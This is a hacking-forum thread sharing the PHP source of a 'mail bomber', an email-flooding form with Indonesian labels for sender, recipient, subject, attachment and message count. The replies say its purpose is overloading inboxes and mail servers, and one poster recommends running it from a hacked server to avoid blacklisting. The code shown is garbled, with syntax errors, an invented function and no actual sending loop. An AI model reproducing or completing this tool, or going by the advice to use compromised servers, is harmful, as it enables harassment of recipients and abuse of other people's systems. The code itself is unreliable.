Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Top Posters

Who's Online (0)

Powered by Vanilla. Made with Bootstrap.
Mail bomber
  • <style type=\"text/css\">
    <!--
    body {
    background-color:#210707;
    font-family: Courier New, Courier, monospace;
    }

    input {
    background-color:#210707;
    border:blue 1px solid;
    color:cyan;
    font-family: arial, verdana, ms sans serif;
    font-size:12pt;
    }

    textarea {
    background-color:#210707;
    border:blue 1px solid;
    color:cyan;
    font-family:arial, verdana, ms sans serif;
    font-size:10pt;
    font-weigth:normal;
    }

    -->
    </style>

    <?php

    echo \"<font color ='cyan'><marquee> mailbomber by vires modiif wendys182<marquee></font><br>\";
    echo \"<br><font color='cyan'>Dari : </font><br>\";
    echo \"<form action='post' action=?>\";
    echo \"<input type='text' name='dari' size=30><br>\";
    echo \"<font color='cyan'>untuk</font><br>\";
    echo \"<input type='text' name='untuk' size=30><br>\";
    echo \"<font color='cyan'>subjek</font><br>\";
    echo \"<input type='text' name='subjek' size=50><br>\";
    echo \"</form>\";

    echo \"<form method='post' enctype='multipart/form-data' action=?>\";
    echo \"<font color='cyan'>Sisipkan<font><br>\";
    echo \"<input type='file' name='fileku'><br><br>\";
    echo \"<font color='cyan'>isi email</font><br>\";
    echo \"<textarea rows=10 cols=82 name='isi_email'></textarea><br><br>\";
    echo \"<font color='cyan'>Direktori : </font>\";
    echo \"<input type='text' name='direktori' value='<? getcwd() ?>' size=54><br>\";
    echo \"<br><font color='cyan' > jumlah : </font>\";
    echo \"<input type='text' name='jumlah' size=10><br>\";
    echo \"<br><input type='submit' value='kirim'>\";
    echo \"</form>\";

    if ($_POST['kirim']) {
    $isi=$_POST['isi_email'];
    $pesan=urlencode($isi);
    $pesan=ereg_replace(\"%5C%22\",\"%22\",$pesan\");
    $pesan=urldecode($pesan);
    $isi=$pesan;
    $subjek=$_POST['subjek'];
    $subjek=stripslashes($subjek);

    if ($_FILES['fileku'] && $_POST['kirim']) {
    $asal=$_FILES['fileku']['tmp_name'];
    $tujuan=$_FILES['fileku']['name'];

    if (!copy($asal,$tujuan) {
    echo \"upload berhasil \" .$_FILES['fileku']['name']. \"<br><br>\";
    }
    $file=$_FILES['fileku']['name'];
    $content=fread(fopen($file,\"r\"),filesize($file);
    $content=chunk_split(base64_code($content));

    else {
    echo \"upload gagal\";
    }
    }
    ?>
  • Xin
    Posts: 3,251
    Nice share did you write?
    Xin
  • Sh3llc0d3
    Posts: 1,910
    Would look neater in code tags, nice share though :)
  • undead
    Posts: 822
    said:


    Nice share did you write?



    I can answer too. No. :)
  • good share bro :)
  • Sh3llc0d3
    Posts: 1,910
    said:


    its no use if u upload to your website and use it for illegal purpose then the server will get blacklisted



    Hence why you use a hacked server ;) I don't think anyone would be really that stupid to upload a bomber on their own server and play away. Although having said that, maybe there is.
  • Sh3llc0d3
    Posts: 1,910
    said:


    said:


    said:


    its no use if u upload to your website and use it for illegal purpose then the server will get blacklisted



    Hence why you use a hacked server ;) I don't think anyone would be really that stupid to upload a bomber on their own server and play away. Although having said that, maybe there is.

    to upload this file on some other website first u need to have access(editing) on other website



    That was why I mentioned using a hacked site/server. If you have admin you have full access to edit.
  • Why would you want to use this script to begin with?
    "Mind, body, heart, and soul; when all work as one, this is control." - myself
  • Xin
    Posts: 3,251
    said:


    Why would you want to use this script to begin with?



    I suppose overloading inboxes and mailservers
    Xin
  • Sh3llc0d3
    Posts: 1,910
    Added code tags and moved to sources